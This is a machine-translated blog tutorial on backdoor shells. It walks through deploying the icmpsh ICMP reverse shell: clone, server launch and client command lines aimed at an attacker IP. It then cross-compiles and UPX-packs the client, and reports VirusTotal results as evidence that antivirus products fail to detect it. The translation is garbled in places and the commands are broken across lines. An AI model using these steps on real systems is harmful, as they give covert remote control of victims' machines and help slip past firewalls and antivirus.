Let's look at Shell.

Let's look at Shell.

Speaking of Shell, I'm afraid everyone will be familiar with it. In addition, I think you should have a lot of your favorites. If you classify them by platform, they can basically be divided into two categories: for the web level and for the system level. Web applications are divided into PHP, JSP, and ASP based on different languages. (This reminds me of the various Backdoors that I have written in those years ......), The system-level systems are generally divided into windows backdoors and unix-based backdoors. However, I have never seen apple backdoors until now, probably because I am poor.

To put it bluntly, what I want to talk to you today is a Shell backdoor for the system. Please don't spray me, I think the article water can be skipped.

0 × 01 I will first divide the classes

Here I will classify them according to different protocols.

First, it is a tcp udp-based shell

This type of shell has been widely used and becomes more and more powerful, because the trojan communication capability based on these two protocols is stronger. Of course, it is easy to attract others. More and more security vendors are paying attention to such shell backdoors. The result is that such Trojans are generally used for industry-level kill-free operations, after being intercepted by anti-virus software, the service becomes useless. Therefore, you need to stop the virus again. This is a little expensive. So ordinary people can't afford to play games without knowing what to do.

Second, shell Based on ICMP protocol

 

We all know that the communication protocol is nothing more than tcp udp icmp. Now that the first two kinds of protocols cannot be used, let's take a look at ICMP.

 

Since it is a communication protocol, it is certainly possible to send data, so let's take a look at what data is sent by a PING:

 

It can be clearly seen from the figure. The first one is the data sent during windows ping, and the second figure shows the data sent during linux ping, which is still a little different.

The above evidence proves that ICMP communication can fly with the data we want, at least theoretically feasible.

Then, the DNS-based shell

In addition to the three protocols, there is also a backdoor shell Based on DNS resolution. I remember someone posted a non-login Method for CMCC (or Chinanet) of Jian (wei), suo (zhi), Feng (ji, DNS is used. There was another Trojan horse that was used to transmit data in this way. The scene was even more cumbersome and simply couldn't bear to look straight ..

 

Here, the DNS resolution backdoor is naturally advantageous, that is, it is extremely difficult to detect, but naturally there are also shortcomings, that is, the data goes slowly. This is not a general slowness. In general, if you want to use advanced functions such as desktop control, it is basically impossible, and the implementation is slightly complicated. So we will not talk about it for the moment. We will discuss it later.

 

After dividing by Protocol, let's try again by connection method.

The connection methods are divided into active connections and passive connections. The active connection is the Bind Shell, and the passive connection is the Reverse Shell. I think you should be familiar with this. Here, I will briefly explain the previous images (the images are from the network)

The attacked host actively connects to the attacked machine. This is called the Reverse Shell, which is currently used by mainstream shells. The disadvantage is that the attacked machine must have a fixed public IP address, the advantage is that you do not need to worry about the dynamic IP address of the target machine causing the disconnection problem.

However, whether it is Bind Shell or Reverse Shell, because the firewall is sensitive based on TCP or UDP, it is easy to be intercepted by the firewall, even if our backdoor has passed the test of soft removal, this round may also lead to a failure in backdoors.

 

What we want to share with you today is: ICMP Reverse Shell

0 × 02 test platform Overview

First, we have to pick up an ICMP communication Shell. Of course, you can write it yourself. The principle of the platform is actually communication. The ICMP communication protocol is used to send the shell command we want to execute to the client through the server, and then the client passes the data obtained after execution back through the ICMP packet, the server is responsible for receiving and then Echo.

Here we select an ICMP Shell project of git for actual operations.

Retrieve the project locally

Git clone https: // github.

Com/inquisb/icmpsh. git/opt/icmp_reverse_shell

 

After getting the file, we can see the file above. Everything here is open-source, so that we can see the detailed principles. Pipeline is the script that the client needs to execute. There is also a icmpsh-s.c slave client source code files, interested students can take a look. In addition, there is a run. sh BASH file. You can view the file content on your own. It is mainly because if you forget to configure something, it will be configured in advance, and the final effect will be icmpsh_m.py, so we use run on the server end. sh.

0 × 03 drills

After talking about this, let's get started.

 

Let's talk about the server:

 

Run. sh

./Run. sh

Then, enter the IP address as prompted. The IP address here should be a public IP address, but the Intranet is used. Therefore, enter the C-segment IP address and press enter to see the prompt:

In this way, the server is configured and is listening.

The following is the client:

Run cmd on the target and enter the following command:

Icmpsh

. Exe-t 192.168.246.129-d 500-B 30-s

 

128

At this point, it's okay to do anything.

The commands executed in Shell have been executed, but the target has no response

The following is the playing time. At this time, when the target can ping the attacker, it will find that the attacker has received a chat about the ping from the target, and there is still "hi", hidden ///...

 

Use wireshark to capture a packet. Well, the data is full.

This is how it works.

0 × 04 about Shell Client

The first problem is the running platform of the Shell client. Obviously, the client is only for the windows platform and the Server is cross-platform.

Then there is the source of the client. Of course, you can use the exe provided by the author on git, or you can check the source code file and compile and shell it by yourself, the compilation process is as follows (only the compilation process of linux is described here ):

Install mingw first, which is the key to compilation.

Sudo apt

-Get updatesudo apt-get install gcc-mingw32

 

In the process, the computer will pack the remaining packages together, so we will not worry about it.

After installation, compile

I686-w64-mingw32-gcc icmpsh-

S.c-o icmp-slave.exe

 

Then we can use upx to add a shell.

Upx-v icmp-

Slave.exe-o icmp-slave-upx.exe

 

Such a client is formed. We can see that the compression ratio is about 56%, and the size is about 56 K after compression.

In fact, apart from the above issues, I think the most important thing is to kill the soft response to the Shell. Careful friends should have discovered that, in the above example, my target was running the experiment of 360 throughout the whole process (not deliberately, it was installed on the target during the previous test, this time), in fact, not only 360. Until now, before writing this article, the vast majority of anti-soft programs have not reported any viruses.

Of course, here I am talking about my own client. As for the clients that come with git, domestic anti-virus software has basically been detected.

 

But I am poor, ..

For a more comprehensive test, I Will paste the result of virustotal.com here:

First of all, we found that most domestic vendors have reported the virus on the client that comes with git. I am very pleased to see it here. :)

 

Then let's take a look at the self-generated exe with Shell added. What is the situation of kernel...

Then let's take a look at the hot ones that have just been compiled. It seems more strange ..

 

It seems that anti-virus software is becoming increasingly sensitive to upx, so it won't be used to add a shell. As for other strange phenomena... Why? UFO!

0 × 05 postscript

Here, the introduction of ICMP reverse Shell has come to an end. Things are really not new, and the technology is not complicated, but the focus is on ideas, it is based on this implementation of more and better (wei) Playing (suo) gameplay. This is the end of this communication.